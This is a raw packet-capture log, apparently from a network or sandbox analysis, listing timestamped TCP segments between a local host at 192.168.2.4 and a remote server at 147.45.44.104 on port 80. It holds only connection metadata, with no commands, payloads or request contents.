Oct 2, 2024 09:41:04.263293982 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263313055 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263319969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263338089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263354063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263356924 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263394117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263746977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263762951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263778925 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263797998 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263843060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263859987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263876915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263878107 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.263895035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.263912916 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.264422894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264456034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.264477968 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264493942 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264528990 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.264538050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264553070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264569044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264585972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264586926 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.264624119 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.264674902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264689922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264705896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.264724970 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.265398979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265414953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265445948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265449047 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.265469074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265485048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265486002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.265501976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265525103 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.265595913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265611887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265626907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265636921 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.265645027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.265664101 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.266366959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266383886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266401052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266403913 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.266417980 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266442060 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.266480923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266496897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266510963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266519070 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.266529083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266542912 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.266551971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266567945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.266586065 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.267287970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.267328024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.353590965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353641033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353677034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353679895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.353713989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353753090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353761911 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.353787899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353821993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353827000 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.353868961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353908062 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.353926897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353960991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353995085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.353998899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354028940 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354065895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354067087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354120970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354171038 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354175091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354207993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354243994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354247093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354283094 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354350090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354382038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354384899 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354435921 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354435921 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354469061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354522943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354537964 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354557037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354592085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354594946 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354624987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354657888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354667902 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354692936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354727983 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354733944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354763985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354798079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354804039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354835033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354876041 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.354887962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354921103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354954958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.354958057 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355010033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355043888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355050087 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355096102 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355130911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355134010 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355166912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355205059 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355220079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355256081 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355288029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355293036 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355324984 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355357885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355364084 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355422020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355459929 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355462074 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355842113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355875969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355884075 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355912924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.355952978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.355967999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356003046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356035948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356040955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.356091022 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356125116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356134892 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.356158972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356193066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356199026 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.356245995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356277943 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.356281042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356313944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356349945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356381893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.356385946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.356431007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357053995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357125044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357162952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357165098 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357198954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357235909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357245922 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357271910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357306957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357311010 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357342005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357376099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357379913 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357410908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357446909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357450962 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357481956 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357515097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357517958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357549906 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357587099 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357589960 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357705116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357743979 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357760906 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357796907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357830048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357835054 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.357865095 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.357902050 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.740865946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740902901 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740921974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740938902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740956068 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740972042 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.740988016 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741000891 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741020918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741029978 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741044044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741051912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741060019 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741066933 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741075039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741082907 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741082907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741091967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741101027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741111040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741163969 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741281986 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741453886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741528034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741564989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741600037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741630077 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741635084 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741689920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741720915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741724968 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741763115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741794109 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741817951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741852999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741883993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741887093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741920948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741940975 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741957903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.741987944 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.741991043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742027044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742058039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742059946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742105007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742136002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742156029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742191076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742207050 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742224932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742259026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742291927 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742324114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742352962 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742357016 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742392063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742422104 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742424965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742459059 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742486954 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742491007 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742526054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742558002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742559910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742594957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742624044 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742626905 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742661953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742691994 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742697001 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742733002 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742763042 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.742772102 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742809057 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.742840052 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.743036985 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746018887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746081114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746110916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746117115 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746167898 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746231079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746258974 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746265888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746298075 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746319056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746354103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746385098 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746387959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746423006 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746452093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746455908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746491909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746521950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746524096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746562958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746594906 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746618032 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746675968 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746704102 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746732950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746737003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746768951 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746774912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746829987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746869087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746896029 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746901989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746954918 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.746985912 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.746988058 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747026920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747057915 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747059107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747093916 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747123957 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747127056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747164011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747193098 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747219086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747276068 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747304916 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747327089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747360945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747391939 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747440100 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747493029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747524023 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747525930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747570038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747600079 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747606993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747642994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747673035 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747675896 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747710943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747741938 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747745991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747776985 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747781038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747814894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747843981 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.747848988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747881889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.747914076 CEST	49734	80	192.168.2.4	147.45.44.104
